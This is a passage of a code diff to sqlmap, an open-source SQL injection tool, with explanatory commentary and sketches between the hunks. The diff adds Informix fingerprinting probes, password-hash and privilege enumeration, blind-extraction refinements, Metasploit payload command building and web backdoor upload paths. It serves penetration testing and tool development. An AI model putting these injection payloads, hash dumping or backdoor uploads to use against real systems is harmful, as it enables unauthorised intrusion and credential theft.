logHTTPTraffic(requestMsg, "%s%s\n\n%s" % (responseMsg, logHeaders, (page or "")[:MAX_CONNECTION_CHUNK_SIZE]))
@@ -691,7 +694,7 @@ class Connect(object):
responseMsg += "[#%d] (%d %s):\n" % (threadData.lastRequestUID, code, status)
if responseHeaders:
-logHeaders = "\n".join("%s: %s" % (getUnicode(key.capitalize() if isinstance(key, basestring) else key), getUnicode(value)) for (key, value) in responseHeaders.items())
+logHeaders = "\n".join(["%s: %s" % (getUnicode(key.capitalize() if isinstance(key, basestring) else key), getUnicode(value)) for (key, value) in responseHeaders.items()])
if not skipLogTraffic:
logHTTPTraffic(requestMsg, "%s%s\n\n%s" % (responseMsg, logHeaders, (page or "")[:MAX_CONNECTION_CHUNK_SIZE]))
@@ -1073,7 +1076,7 @@ class Connect(object):
dataToStdout(" (done)\n")
elif not kb.testMode:
-warnMsg = "it is very important to not stress the network adapter "
+warnMsg = "it is very important to not stress the network connection "
warnMsg += "during usage of time-based payloads to prevent potential "
warnMsg += "disruptions "
singleTimeWarnMessage(warnMsg)
@@ -1140,6 +1143,7 @@ class Connect(object):
threadData.lastQueryDuration = calculateDeltaSeconds(start)
threadData.lastPage = page
+threadData.lastCode = code
kb.originalCode = kb.originalCode or code
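The hidden --murphy-rate switch handled above makes roughly one request in every murphyRate return random junk, after a random pause, so the detection engine can be stress-tested against flaky targets. A loose standalone sketch of that fault-injection idea (constants and names here are illustrative, not sqlmap's):

import random
import string
import time

MAX_MURPHY_SLEEP_TIME = 3    # assumed value, only for this sketch

def get_page(url, murphy_rate=None):
    # with probability ~1/murphy_rate, simulate a flaky response
    if murphy_rate and random.randrange(murphy_rate) == 0:
        time.sleep(random.randint(0, MAX_MURPHY_SLEEP_TIME))
        junk = "".join(random.choice(string.printable) for _ in range(64))
        return junk, None, random.choice((None, 200, 404, 500))
    return "<html>normal response for %s</html>" % url, {}, 200

print(get_page("http://target/?id=1", murphy_rate=2))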

View File

@@ -429,10 +429,12 @@ class Metasploit:
self._payloadCmd += " X > \"%s\"" % outFile
else:
if extra == "BufferRegister=EAX":
-self._payloadCmd += " -a x86 -e %s -f %s > \"%s\"" % (self.encoderStr, format, outFile)
+self._payloadCmd += " -a x86 -e %s -f %s" % (self.encoderStr, format)
if extra is not None:
self._payloadCmd += " %s" % extra
+self._payloadCmd += " > \"%s\"" % outFile
else:
self._payloadCmd += " -f exe > \"%s\"" % outFile

View File

@@ -116,7 +116,7 @@ class Web:
multipartParams['__EVENTVALIDATION'] = kb.data.__EVENTVALIDATION
multipartParams['__VIEWSTATE'] = kb.data.__VIEWSTATE
-page = Request.getPage(url=self.webStagerUrl, multipart=multipartParams, raise404=False)
+page, _, _ = Request.getPage(url=self.webStagerUrl, multipart=multipartParams, raise404=False)
if "File uploaded" not in page:
warnMsg = "unable to upload the file through the web file "
@@ -200,6 +200,15 @@ class Web:
directories.extend(getAutoDirectories())
directories = list(oset(directories))
+path = urlparse.urlparse(conf.url).path or '/'
+if path != '/':
+_ = []
+for directory in directories:
+_.append(directory)
+if not directory.endswith(path):
+_.append("%s/%s" % (directory.rstrip('/'), path.strip('/')))
+directories = _
backdoorName = "tmpb%s.%s" % (randomStr(lowercase=True), self.webApi)
backdoorContent = decloak(os.path.join(paths.SQLMAP_SHELL_PATH, "backdoor.%s_" % self.webApi))
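The block added above also tries web subdirectories: each candidate document root is duplicated with the sub-path taken from the target URL appended, which is what fixes file-stager uploads for applications living below the web root. A condensed sketch of that list expansion, using urllib's urlparse rather than sqlmap's surrounding plumbing:

try:
    from urllib.parse import urlparse    # Python 3
except ImportError:
    from urlparse import urlparse        # Python 2

def expand_directories(directories, url):
    path = urlparse(url).path or '/'
    if path == '/':
        return list(directories)
    expanded = []
    for directory in directories:
        expanded.append(directory)
        if not directory.endswith(path):
            # e.g. /var/www + /app/ -> /var/www/app
            expanded.append("%s/%s" % (directory.rstrip('/'), path.strip('/')))
    return expanded

print(expand_directories(["/var/www", "/var/www/html"], "http://target/app/"))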

View File

@@ -41,7 +41,7 @@ from lib.core.settings import INFERENCE_GREATER_CHAR
from lib.core.settings import INFERENCE_EQUALS_CHAR
from lib.core.settings import INFERENCE_NOT_EQUALS_CHAR
from lib.core.settings import MAX_BISECTION_LENGTH
-from lib.core.settings import MAX_TIME_REVALIDATION_STEPS
+from lib.core.settings import MAX_REVALIDATION_STEPS
from lib.core.settings import NULL
from lib.core.settings import PARTIAL_HEX_VALUE_MARKER
from lib.core.settings import PARTIAL_VALUE_MARKER
@@ -66,6 +66,7 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None
finalValue = None
retrievedLength = 0
asciiTbl = getCharset(charsetType)
+threadData = getCurrentThreadData()
timeBasedCompare = (kb.technique in (PAYLOAD.TECHNIQUE.TIME, PAYLOAD.TECHNIQUE.STACKED))
retVal = hashDBRetrieve(expression, checkConf=True)
@@ -143,7 +144,7 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None
length = None
showEta = conf.eta and isinstance(length, int)
-numThreads = min(conf.threads, length)
+numThreads = min(conf.threads, length) or 1
if showEta:
progress = ProgressBar(maxValue=length)
@@ -197,8 +198,7 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None
def validateChar(idx, value):
"""
-Used in time-based inference (in case that original and retrieved
-value are not equal there will be a deliberate delay).
+Used in inference - in time-based SQLi if original and retrieved value are not equal there will be a deliberate delay
"""
if "'%s'" % CHAR_INFERENCE_MARK not in payload:
@@ -209,10 +209,17 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None
unescapedCharValue = unescaper.escape("'%s'" % decodeIntToUnicode(value))
forgedPayload = safeStringFormat(payload.replace(INFERENCE_GREATER_CHAR, INFERENCE_NOT_EQUALS_CHAR), (expressionUnescaped, idx)).replace(markingValue, unescapedCharValue)
-result = Request.queryPage(forgedPayload, timeBasedCompare=timeBasedCompare, raise404=False)
+result = not Request.queryPage(forgedPayload, timeBasedCompare=timeBasedCompare, raise404=False)
+if result and timeBasedCompare:
+result = threadData.lastCode == kb.injection.data[kb.technique].trueCode
+if not result:
+warnMsg = "detected HTTP code '%s' in validation phase is differing from expected '%s'" % (threadData.lastCode, kb.injection.data[kb.technique].trueCode)
+singleTimeWarnMessage(warnMsg)
incrementCounter(kb.technique)
-return not result
+return result
def getChar(idx, charTbl=None, continuousOrder=True, expand=charsetType is None, shiftTable=None, retried=None):
"""
@@ -254,9 +261,44 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None
maxChar = maxValue = charTbl[-1]
minChar = minValue = charTbl[0]
+firstCheck = False
+lastCheck = False
+unexpectedCode = False
while len(charTbl) != 1:
+position = None
+if charsetType is None:
+if not firstCheck:
+try:
+try:
+lastChar = [_ for _ in threadData.shared.value if _ is not None][-1]
+except IndexError:
+lastChar = None
+if 'a' <= lastChar <= 'z':
+position = charTbl.index(ord('a') - 1) # 96
+elif 'A' <= lastChar <= 'Z':
+position = charTbl.index(ord('A') - 1) # 64
+elif '0' <= lastChar <= '9':
+position = charTbl.index(ord('0') - 1) # 47
+except ValueError:
+pass
+finally:
+firstCheck = True
+elif not lastCheck and numThreads == 1: # not usable in multi-threading environment
+if charTbl[(len(charTbl) >> 1)] < ord(' '):
+try:
+# favorize last char check if current value inclines toward 0
+position = charTbl.index(1)
+except ValueError:
+pass
+finally:
+lastCheck = True
+if position is None:
position = (len(charTbl) >> 1)
posValue = charTbl[position]
falsePayload = None
@@ -279,6 +321,12 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None
result = Request.queryPage(forgedPayload, timeBasedCompare=timeBasedCompare, raise404=False)
incrementCounter(kb.technique)
+if not timeBasedCompare:
+unexpectedCode |= threadData.lastCode not in (kb.injection.data[kb.technique].falseCode, kb.injection.data[kb.technique].trueCode)
+if unexpectedCode:
+warnMsg = "unexpected HTTP code '%s' detected. Will use (extra) validation step in similar cases" % threadData.lastCode
+singleTimeWarnMessage(warnMsg)
if result:
minValue = posValue
@@ -318,15 +366,16 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None
retVal = minValue + 1
if retVal in originalTbl or (retVal == ord('\n') and CHAR_INFERENCE_MARK in payload):
-if timeBasedCompare and not validateChar(idx, retVal):
+if (timeBasedCompare or unexpectedCode) and not validateChar(idx, retVal):
if not kb.originalTimeDelay:
kb.originalTimeDelay = conf.timeSec
-kb.timeValidCharsRun = 0
+threadData.validationRun = 0
-if retried < MAX_TIME_REVALIDATION_STEPS:
+if retried < MAX_REVALIDATION_STEPS:
errMsg = "invalid character detected. retrying.."
logger.error(errMsg)
+if timeBasedCompare:
if kb.adjustTimeDelay is not ADJUST_TIME_DELAY.DISABLE:
conf.timeSec += 1
warnMsg = "increasing time delay to %d second%s " % (conf.timeSec, 's' if conf.timeSec > 1 else '')
@@ -345,8 +394,8 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None
return decodeIntToUnicode(retVal)
else:
if timeBasedCompare:
-kb.timeValidCharsRun += 1
-if kb.adjustTimeDelay is ADJUST_TIME_DELAY.NO and kb.timeValidCharsRun > VALID_TIME_CHARS_RUN_THRESHOLD:
+threadData.validationRun += 1
+if kb.adjustTimeDelay is ADJUST_TIME_DELAY.NO and threadData.validationRun > VALID_TIME_CHARS_RUN_THRESHOLD:
dbgMsg = "turning back on time auto-adjustment mechanism"
logger.debug(dbgMsg)
kb.adjustTimeDelay = ADJUST_TIME_DELAY.YES
@@ -376,8 +425,6 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None
# Go multi-threading (--threads > 1)
if conf.threads > 1 and isinstance(length, int) and length > 1:
-threadData = getCurrentThreadData()
threadData.shared.value = [None] * length
threadData.shared.index = [firstChar] # As list for python nested function scoping
threadData.shared.start = firstChar
@@ -476,6 +523,7 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None
# No multi-threading (--threads = 1)
else:
index = firstChar
+threadData.shared.value = ""
while True:
index += 1
@@ -551,7 +599,7 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None
if kb.data.processChar:
val = kb.data.processChar(val)
-partialValue += val
+threadData.shared.value = partialValue = partialValue + val
if showEta:
progress.progress(time.time() - charStart, index)
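Two ideas land in this bisection hunk: retrieved characters get re-validated whenever time-based comparison is in play or an unexpected HTTP code shows up, and the first probe for each character can jump to a character-class boundary (ordinals 96, 64 or 47) when the previously extracted character was a lowercase letter, an uppercase letter or a digit. A compact sketch of that locality heuristic over a plain sorted table, with a fake oracle standing in for Request.queryPage:

def find_code(is_greater, tbl, last_char=None):
    """Binary-search sorted ordinals in tbl with an oracle answering 'target > value'."""
    lo, hi = 0, len(tbl) - 1
    first_check = False
    while lo < hi:
        mid = (lo + hi) >> 1
        if not first_check:
            first_check = True
            boundary = None
            if last_char and 'a' <= last_char <= 'z':
                boundary = ord('a') - 1      # 96, just below lowercase letters
            elif last_char and 'A' <= last_char <= 'Z':
                boundary = ord('A') - 1      # 64, just below uppercase letters
            elif last_char and '0' <= last_char <= '9':
                boundary = ord('0') - 1      # 47, just below digits
            if boundary in tbl and tbl[lo] <= boundary < tbl[hi]:
                mid = tbl.index(boundary)    # first probe lands on the class boundary
        if is_greater(tbl[mid]):
            lo = mid + 1
        else:
            hi = mid
    return tbl[lo]

target = ord('m')                            # pretend the hidden character is 'm'
probes = []

def is_greater(value):
    probes.append(value)
    return target > value

print(chr(find_code(is_greater, list(range(128)), last_char='k')), "probes:", len(probes))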

View File

@@ -44,6 +44,8 @@ def checkDependencies():
elif dbmsName == DBMS.HSQLDB:
import jaydebeapi
import jpype
+elif dbmsName == DBMS.INFORMIX:
+import ibm_db_dbi
except ImportError:
warnMsg = "sqlmap requires '%s' third-party library " % data[1]
warnMsg += "in order to directly connect to the DBMS "

View File

@@ -85,3 +85,9 @@ class xrange(object):
def _index(self, i):
return self.start + self.step * i
+def index(self, i):
+if self.start <= i < self.stop:
+return i - self.start
+else:
+raise ValueError("%d is not in list" % i)
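The new index() method above gives the custom xrange replacement the list.index() behaviour that callers expect (start <= i < stop maps to offset i - start). A tiny stand-alone illustration, assuming step 1:

class xrange_like(object):
    # minimal stand-in for the thirdparty xrange wrapper, step fixed at 1
    def __init__(self, start, stop):
        self.start, self.stop = start, stop

    def index(self, i):
        if self.start <= i < self.stop:
            return i - self.start
        else:
            raise ValueError("%d is not in list" % i)

r = xrange_like(10, 20)
print(r.index(15))    # -> 5, same as list(range(10, 20)).index(15)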

View File

@@ -0,0 +1,34 @@
#!/usr/bin/env python
"""
Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission
"""
from lib.core.enums import DBMS
from lib.core.settings import INFORMIX_SYSTEM_DBS
from lib.core.unescaper import unescaper
from plugins.dbms.informix.enumeration import Enumeration
from plugins.dbms.informix.filesystem import Filesystem
from plugins.dbms.informix.fingerprint import Fingerprint
from plugins.dbms.informix.syntax import Syntax
from plugins.dbms.informix.takeover import Takeover
from plugins.generic.misc import Miscellaneous
class InformixMap(Syntax, Fingerprint, Enumeration, Filesystem, Miscellaneous, Takeover):
"""
This class defines Informix methods
"""
def __init__(self):
self.excludeDbsList = INFORMIX_SYSTEM_DBS
Syntax.__init__(self)
Fingerprint.__init__(self)
Enumeration.__init__(self)
Filesystem.__init__(self)
Miscellaneous.__init__(self)
Takeover.__init__(self)
unescaper[DBMS.INFORMIX] = Syntax.escape

View File

@@ -0,0 +1,63 @@
#!/usr/bin/env python
"""
Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission
"""
try:
import ibm_db_dbi
except ImportError:
pass
import logging
from lib.core.data import conf
from lib.core.data import logger
from lib.core.exception import SqlmapConnectionException
from plugins.generic.connector import Connector as GenericConnector
class Connector(GenericConnector):
"""
Homepage: http://code.google.com/p/ibm-db/
User guide: http://code.google.com/p/ibm-db/wiki/README
API: http://www.python.org/dev/peps/pep-0249/
License: Apache License 2.0
"""
def __init__(self):
GenericConnector.__init__(self)
def connect(self):
self.initConnection()
try:
database = "DATABASE=%s;HOSTNAME=%s;PORT=%s;PROTOCOL=TCPIP;" % (self.db, self.hostname, self.port)
self.connector = ibm_db_dbi.connect(database, self.user, self.password)
except ibm_db_dbi.OperationalError, msg:
raise SqlmapConnectionException(msg)
self.initCursor()
self.printConnected()
def fetchall(self):
try:
return self.cursor.fetchall()
except ibm_db_dbi.ProgrammingError, msg:
logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, "(remote) %s" % msg[1])
return None
def execute(self, query):
try:
self.cursor.execute(query)
except (ibm_db_dbi.OperationalError, ibm_db_dbi.ProgrammingError), msg:
logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, "(remote) %s" % msg[1])
except ibm_db_dbi.InternalError, msg:
raise SqlmapConnectionException(msg[1])
self.connector.commit()
def select(self, query):
self.execute(query)
return self.fetchall()

View File

@@ -0,0 +1,12 @@
#!/usr/bin/env python
"""
Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission
"""
from plugins.generic.enumeration import Enumeration as GenericEnumeration
class Enumeration(GenericEnumeration):
def __init__(self):
GenericEnumeration.__init__(self)

View File

@@ -0,0 +1,12 @@
#!/usr/bin/env python
"""
Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission
"""
from plugins.generic.filesystem import Filesystem as GenericFilesystem
class Filesystem(GenericFilesystem):
def __init__(self):
GenericFilesystem.__init__(self)

View File

@@ -0,0 +1,105 @@
#!/usr/bin/env python
"""
Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission
"""
from lib.core.common import Backend
from lib.core.common import Format
from lib.core.data import conf
from lib.core.data import kb
from lib.core.data import logger
from lib.core.enums import DBMS
from lib.core.session import setDbms
from lib.core.settings import INFORMIX_ALIASES
from lib.request import inject
from plugins.generic.fingerprint import Fingerprint as GenericFingerprint
class Fingerprint(GenericFingerprint):
def __init__(self):
GenericFingerprint.__init__(self, DBMS.INFORMIX)
def getFingerprint(self):
value = ""
wsOsFp = Format.getOs("web server", kb.headersFp)
if wsOsFp:
value += "%s\n" % wsOsFp
if kb.data.banner:
dbmsOsFp = Format.getOs("back-end DBMS", kb.bannerFp)
if dbmsOsFp:
value += "%s\n" % dbmsOsFp
value += "back-end DBMS: "
if not conf.extensiveFp:
value += DBMS.INFORMIX
return value
actVer = Format.getDbms()
blank = " " * 15
value += "active fingerprint: %s" % actVer
if kb.bannerFp:
banVer = kb.bannerFp["dbmsVersion"] if 'dbmsVersion' in kb.bannerFp else None
banVer = Format.getDbms([banVer])
value += "\n%sbanner parsing fingerprint: %s" % (blank, banVer)
htmlErrorFp = Format.getErrorParsedDBMSes()
if htmlErrorFp:
value += "\n%shtml error message fingerprint: %s" % (blank, htmlErrorFp)
return value
def checkDbms(self):
if not conf.extensiveFp and (Backend.isDbmsWithin(INFORMIX_ALIASES) or (conf.dbms or "").lower() in INFORMIX_ALIASES):
setDbms(DBMS.INFORMIX)
self.getBanner()
return True
infoMsg = "testing %s" % DBMS.INFORMIX
logger.info(infoMsg)
result = inject.checkBooleanExpression("[RANDNUM]=(SELECT [RANDNUM] FROM SYSMASTER:SYSDUAL)")
if result:
infoMsg = "confirming %s" % DBMS.INFORMIX
logger.info(infoMsg)
result = inject.checkBooleanExpression("(SELECT DBINFO('DBNAME') FROM SYSMASTER:SYSDUAL) IS NOT NULL")
if not result:
warnMsg = "the back-end DBMS is not %s" % DBMS.INFORMIX
logger.warn(warnMsg)
return False
setDbms(DBMS.INFORMIX)
self.getBanner()
if not conf.extensiveFp:
return True
infoMsg = "actively fingerprinting %s" % DBMS.INFORMIX
logger.info(infoMsg)
for version in ("12.1", "11.7", "11.5"):
output = inject.checkBooleanExpression("EXISTS(SELECT 1 FROM SYSMASTER:SYSDUAL WHERE DBINFO('VERSION','FULL') LIKE '%%%s%%')" % version)
if output:
Backend.setVersion(version)
break
return True
else:
warnMsg = "the back-end DBMS is not %s" % DBMS.INFORMIX
logger.warn(warnMsg)
return False

View File

@@ -0,0 +1,24 @@
#!/usr/bin/env python
"""
Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission
"""
from plugins.generic.syntax import Syntax as GenericSyntax

class Syntax(GenericSyntax):
    def __init__(self):
        GenericSyntax.__init__(self)

    @staticmethod
    def escape(expression, quote=True):
        """
        >>> Syntax.escape("SELECT 'abcdefgh' FROM foobar")
        'SELECT CHR(97)||CHR(98)||CHR(99)||CHR(100)||CHR(101)||CHR(102)||CHR(103)||CHR(104) FROM foobar'
        """

        def escaper(value):
            return "||".join("CHR(%d)" % ord(_) for _ in value)

        return Syntax._escape(expression, quote, escaper)
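The escaper rewrites every quoted string literal as a CHR() concatenation so payloads keep working when quotes are filtered or escaped. The transformation itself, isolated as plain Python for illustration:

def chr_escape(value):
    # 'abc' -> CHR(97)||CHR(98)||CHR(99)
    return "||".join("CHR(%d)" % ord(c) for c in value)

print(chr_escape("abc"))  # CHR(97)||CHR(98)||CHR(99)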


@@ -0,0 +1,15 @@
#!/usr/bin/env python
"""
Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission
"""
from plugins.generic.takeover import Takeover as GenericTakeover

class Takeover(GenericTakeover):
    def __init__(self):
        self.__basedir = None
        self.__datadir = None

        GenericTakeover.__init__(self)


@@ -49,9 +49,9 @@ class Fingerprint(GenericFingerprint):
(50000, 50092), # MySQL 5.0
(50100, 50172), # MySQL 5.1
(50400, 50404), # MySQL 5.4
-(50500, 50549), # MySQL 5.5
+(50500, 50552), # MySQL 5.5
-(50600, 50630), # MySQL 5.6
+(50600, 50633), # MySQL 5.6
-(50700, 50712), # MySQL 5.7
+(50700, 50715), # MySQL 5.7
(60000, 60014), # MySQL 6.0
)
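These tuples are (low, high) build-number ranges per MySQL branch; they are refreshed here because MySQL's executable comments (/*!NNNNN ... */) only run when the server build is at least NNNNN, which lets a boolean probe bracket the exact build inside a range. A rough sketch of one such probe, with check() as a hypothetical callback evaluating a boolean condition on the target:

def mysql_version_at_least(check, num):
    # /*!NNNNN AND 1=0*/ is executed only on builds >= NNNNN,
    # turning the condition false exactly on newer servers
    return not check("1=1 /*!%05d AND 1=0*/" % num)

# e.g. bisect between 50500 and 50552 to pin the exact 5.5.x build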


@@ -97,8 +97,16 @@ class Fingerprint(GenericFingerprint):
infoMsg = "actively fingerprinting %s" % DBMS.PGSQL infoMsg = "actively fingerprinting %s" % DBMS.PGSQL
logger.info(infoMsg) logger.info(infoMsg)
if inject.checkBooleanExpression("REVERSE('sqlmap')='pamlqs'"): if inject.checkBooleanExpression("TO_JSONB(1) IS NOT NULL"):
Backend.setVersion(">= 9.1.0") Backend.setVersion(">= 9.5.0")
elif inject.checkBooleanExpression("JSON_TYPEOF(NULL) IS NULL"):
Backend.setVersionList([">= 9.4.0", "< 9.5.0"])
elif inject.checkBooleanExpression("ARRAY_REPLACE(NULL,1,1) IS NULL"):
Backend.setVersionList([">= 9.3.0", "< 9.4.0"])
elif inject.checkBooleanExpression("ROW_TO_JSON(NULL) IS NULL"):
Backend.setVersionList([">= 9.2.0", "< 9.3.0"])
elif inject.checkBooleanExpression("REVERSE('sqlmap')='pamlqs'"):
Backend.setVersionList([">= 9.1.0", "< 9.2.0"])
elif inject.checkBooleanExpression("LENGTH(TO_CHAR(1,'EEEE'))>0"): elif inject.checkBooleanExpression("LENGTH(TO_CHAR(1,'EEEE'))>0"):
Backend.setVersionList([">= 9.0.0", "< 9.1.0"]) Backend.setVersionList([">= 9.0.0", "< 9.1.0"])
elif inject.checkBooleanExpression("2=(SELECT DIV(6,3))"): elif inject.checkBooleanExpression("2=(SELECT DIV(6,3))"):


@@ -32,6 +32,7 @@ from lib.core.data import logger
from lib.core.data import paths
from lib.core.data import queries
from lib.core.dicts import FIREBIRD_TYPES
+from lib.core.dicts import INFORMIX_TYPES
from lib.core.enums import CHARSET_TYPE
from lib.core.enums import DBMS
from lib.core.enums import EXPECTED
@@ -335,7 +336,7 @@ class Databases:
    query = rootQuery.blind.query % (kb.data.cachedTables[-1] if kb.data.cachedTables else " ")
elif Backend.getIdentifiedDbms() in (DBMS.SQLITE, DBMS.FIREBIRD):
    query = rootQuery.blind.query % index
-elif Backend.isDbms(DBMS.HSQLDB):
+elif Backend.getIdentifiedDbms() in (DBMS.HSQLDB, DBMS.INFORMIX):
    query = rootQuery.blind.query % (index, unsafeSQLIdentificatorNaming(db))
else:
    query = rootQuery.blind.query % (unsafeSQLIdentificatorNaming(db), index)
@@ -603,8 +604,17 @@ class Databases:
if len(columnData) == 1:
    columns[name] = None
else:
+    key = int(columnData[1]) if isinstance(columnData[1], basestring) and columnData[1].isdigit() else columnData[1]
    if Backend.isDbms(DBMS.FIREBIRD):
-        columnData[1] = FIREBIRD_TYPES.get(int(columnData[1]) if isinstance(columnData[1], basestring) and columnData[1].isdigit() else columnData[1], columnData[1])
+        columnData[1] = FIREBIRD_TYPES.get(key, columnData[1])
+    elif Backend.isDbms(DBMS.INFORMIX):
+        notNull = False
+        if isinstance(key, int) and key > 255:
+            key -= 256
+            notNull = True
+        columnData[1] = INFORMIX_TYPES.get(key, columnData[1])
+        if notNull:
+            columnData[1] = "%s NOT NULL" % columnData[1]
    columns[name] = columnData[1]
@@ -656,6 +666,10 @@ class Databases:
    query = rootQuery.blind.count % (tbl)
    query += condQuery
+elif Backend.isDbms(DBMS.INFORMIX):
+    query = rootQuery.blind.count % (conf.db, conf.db, conf.db, conf.db, conf.db, tbl)
+    query += condQuery
elif Backend.isDbms(DBMS.SQLITE):
    query = rootQuery.blind.query % tbl
value = unArrayizeValue(inject.getValue(query, union=False, error=False))
@@ -712,6 +726,10 @@ class Databases:
    query = rootQuery.blind.query % (tbl)
    query += condQuery
    field = None
+elif Backend.isDbms(DBMS.INFORMIX):
+    query = rootQuery.blind.query % (index, conf.db, conf.db, conf.db, conf.db, conf.db, tbl)
+    query += condQuery
+    field = condition
query = agent.limitQuery(index, query, field, field)
column = unArrayizeValue(inject.getValue(query, union=False, error=False))
@@ -744,11 +762,22 @@ class Databases:
                                  conf.db, conf.db, unsafeSQLIdentificatorNaming(tbl).split(".")[-1])
elif Backend.isDbms(DBMS.FIREBIRD):
    query = rootQuery.blind.query2 % (tbl, column)
+elif Backend.isDbms(DBMS.INFORMIX):
+    query = rootQuery.blind.query2 % (conf.db, conf.db, conf.db, conf.db, conf.db, tbl, column)
colType = unArrayizeValue(inject.getValue(query, union=False, error=False))
+key = int(colType) if isinstance(colType, basestring) and colType.isdigit() else colType
if Backend.isDbms(DBMS.FIREBIRD):
-    colType = FIREBIRD_TYPES.get(colType, colType)
+    colType = FIREBIRD_TYPES.get(key, colType)
+elif Backend.isDbms(DBMS.INFORMIX):
+    notNull = False
+    if isinstance(key, int) and key > 255:
+        key -= 256
+        notNull = True
+    colType = INFORMIX_TYPES.get(key, colType)
+    if notNull:
+        colType = "%s NOT NULL" % colType
column = safeSQLIdentificatorNaming(column)
columns[column] = colType
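The repeated key > 255 handling mirrors how Informix encodes column metadata: syscolumns.coltype has 256 added when the column is NOT NULL, so subtracting 256 recovers the base type code. A small decoder for illustration (the type map here is an assumed subset, not the full INFORMIX_TYPES dictionary):

INFORMIX_TYPE_SUBSET = {0: "CHAR", 1: "SMALLINT", 2: "INTEGER", 7: "DATE", 13: "VARCHAR"}

def decode_coltype(code):
    not_null = code > 255              # +256 flags a NOT NULL column
    base = code - 256 if not_null else code
    name = INFORMIX_TYPE_SUBSET.get(base, str(code))
    return "%s NOT NULL" % name if not_null else name

print(decode_coltype(269))  # VARCHAR NOT NULL (269 = 13 + 256)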


@@ -110,6 +110,9 @@ class Entries:
kb.data.cachedColumns = foundData
try:
-    kb.dumpTable = "%s.%s" % (conf.db, tbl)
+    if Backend.isDbms(DBMS.INFORMIX):
+        kb.dumpTable = "%s:%s" % (conf.db, tbl)
+    else:
+        kb.dumpTable = "%s.%s" % (conf.db, tbl)
    if not safeSQLIdentificatorNaming(conf.db) in kb.data.cachedColumns \
@@ -236,6 +239,8 @@ class Entries:
query = rootQuery.blind.count % ("%s.%s" % (conf.db, tbl)) query = rootQuery.blind.count % ("%s.%s" % (conf.db, tbl))
elif Backend.isDbms(DBMS.MAXDB): elif Backend.isDbms(DBMS.MAXDB):
query = rootQuery.blind.count % tbl query = rootQuery.blind.count % tbl
elif Backend.isDbms(DBMS.INFORMIX):
query = rootQuery.blind.count % (conf.db, tbl)
else: else:
query = rootQuery.blind.count % (conf.db, tbl) query = rootQuery.blind.count % (conf.db, tbl)
@@ -316,14 +321,13 @@ class Entries:
if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL, DBMS.HSQLDB):
    query = rootQuery.blind.query % (agent.preprocessField(tbl, column), conf.db, conf.tbl, sorted(colList, key=len)[0], index)
elif Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2):
-    query = rootQuery.blind.query % (agent.preprocessField(tbl, column),
-                                     tbl.upper() if not conf.db else ("%s.%s" % (conf.db.upper(), tbl.upper())),
-                                     index)
+    query = rootQuery.blind.query % (agent.preprocessField(tbl, column), tbl.upper() if not conf.db else ("%s.%s" % (conf.db.upper(), tbl.upper())), index)
elif Backend.isDbms(DBMS.SQLITE):
    query = rootQuery.blind.query % (agent.preprocessField(tbl, column), tbl, index)
elif Backend.isDbms(DBMS.FIREBIRD):
    query = rootQuery.blind.query % (index, agent.preprocessField(tbl, column), tbl)
+elif Backend.isDbms(DBMS.INFORMIX):
+    query = rootQuery.blind.query % (index, agent.preprocessField(tbl, column), conf.db, tbl, sorted(colList, key=len)[0])
query = whereQuery(query)


@@ -27,10 +27,11 @@ from lib.core.data import conf
from lib.core.data import kb
from lib.core.data import logger
from lib.core.data import queries
+from lib.core.dicts import DB2_PRIVS
+from lib.core.dicts import FIREBIRD_PRIVS
+from lib.core.dicts import INFORMIX_PRIVS
from lib.core.dicts import MYSQL_PRIVS
from lib.core.dicts import PGSQL_PRIVS
-from lib.core.dicts import FIREBIRD_PRIVS
-from lib.core.dicts import DB2_PRIVS
from lib.core.enums import CHARSET_TYPE
from lib.core.enums import DBMS
from lib.core.enums import EXPECTED
@@ -251,6 +252,9 @@ class Users:
if user in retrievedUsers:
    continue
+if Backend.isDbms(DBMS.INFORMIX):
+    count = 1
+else:
    infoMsg = "fetching number of password hashes "
    infoMsg += "for user '%s'" % user
    logger.info(infoMsg)
@@ -282,11 +286,14 @@ class Users:
        query = rootQuery.blind.query2 % (user, index, user)
    else:
        query = rootQuery.blind.query % (user, index, user)
+elif Backend.isDbms(DBMS.INFORMIX):
+    query = rootQuery.blind.query % (user,)
else:
    query = rootQuery.blind.query % (user, index)
password = unArrayizeValue(inject.getValue(query, union=False, error=False))
password = parsePasswordHash(password)
passwords.append(password)
if passwords:
@@ -470,6 +477,9 @@ class Users:
if Backend.isDbms(DBMS.MYSQL) and kb.data.has_information_schema:
    user = "%%%s%%" % user
+if Backend.isDbms(DBMS.INFORMIX):
+    count = 1
+else:
    infoMsg = "fetching number of privileges "
    infoMsg += "for user '%s'" % outuser
    logger.info(infoMsg)
@@ -514,6 +524,8 @@ class Users:
    query = rootQuery.blind.query2 % (user, index)
elif Backend.isDbms(DBMS.FIREBIRD):
    query = rootQuery.blind.query % (index, user)
+elif Backend.isDbms(DBMS.INFORMIX):
+    query = rootQuery.blind.query % (user,)
else:
    query = rootQuery.blind.query % (user, index)
@@ -561,6 +573,10 @@ class Users:
elif Backend.isDbms(DBMS.FIREBIRD):
    privileges.add(FIREBIRD_PRIVS[privilege.strip()])
+# In Informix we get one letter for the highest privilege
+elif Backend.isDbms(DBMS.INFORMIX):
